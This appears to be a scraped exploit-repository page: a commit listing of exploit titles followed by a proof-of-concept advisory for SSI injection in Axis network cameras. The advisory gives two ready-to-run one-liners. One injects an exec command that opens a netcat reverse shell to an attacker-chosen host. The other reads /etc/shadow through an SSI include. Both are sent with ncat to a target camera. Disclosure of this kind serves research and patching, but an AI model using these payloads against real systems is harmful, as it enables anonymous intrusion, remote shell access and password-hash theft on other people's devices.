2c4b08963a
25 changes to exploits/shellcodes QNAP NAS Devices - Heap Overflow QNAP NVR/NAS - Buffer Overflow (PoC) QNAP NVR/NAS Devices - Buffer Overflow (PoC) Cisco ASA - Crash PoC Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption Android - 'getpidcon' Permission Bypass in KeyStore Service Multiple OEM - 'nsd' Remote Stack Format String (PoC) HP-UX 11.0 - pppd Stack Buffer Overflow HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow SGI IRIX - 'LsD' Multiple Buffer Overflows SGI IRIX - 'LsD' Multiple Local Buffer Overflows PostScript Utilities - 'psnup' Argument Buffer Overflow PostScript Utilities - 'psnup' Local Buffer Overflow Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access Geovision Inc. IP Camera & Video - Remote Command Execution Axis SSI - Remote Command Execution / Read Files Axis Communications MPQT/PACS - Heap Overflow / Information Leakage Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD Uniview - Remote Command Execution / Export Config (PoC) Vitek - Remote Command Execution / Information Disclosure (PoC) Vivotek IP Cameras - Remote Stack Overflow (PoC) Dahua Generation 2/3 - Backdoor Access HiSilicon DVR Devices - Remote Code Execution JiRos Banner Experience 1.0 - Unauthorised Create Admin JiRos Banner Experience 1.0 - Unauthorized Create Admin Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Naukri Clone Script - Persistent Cross-Site Scripting Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting Online Test Script 2.0.7 - 'cid' SQL Injection Entrepreneur Dating Script 2.0.2 - Authentication Bypass
28 lines
No EOL
1 KiB
Text
28 lines
No EOL
1 KiB
Text
[STX]
|
|
|
|
Subject: SSI Remote Execute and Read Files
|
|
Researcher: bashis <mcw noemail eu> (August 2016)
|
|
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)
|
|
|
|
Attack Vector: Remote
|
|
Authentication: Anonymous (no credentials needed)
|
|
Conditions: The cam must be configure to allow anonymous view
|
|
|
|
Execute remote commands (PoC: Connect back shell):
|
|
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
|
|
|
|
Notes:
|
|
<CONNECT BACK IP> = LHOST IP
|
|
<CONNECT BACK PORT> = LHOST PORT
|
|
<TARGET IP> = RHOST IP
|
|
<TARGET PORT> RHOST PORT
|
|
|
|
|
|
Read remote files (PoC: Read /etc/shadow - check top of the returned output):
|
|
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
|
|
|
|
Notes:
|
|
<TARGET IP> = RHOST IP
|
|
<TARGET PORT> RHOST PORT
|
|
|
|
[ETX] |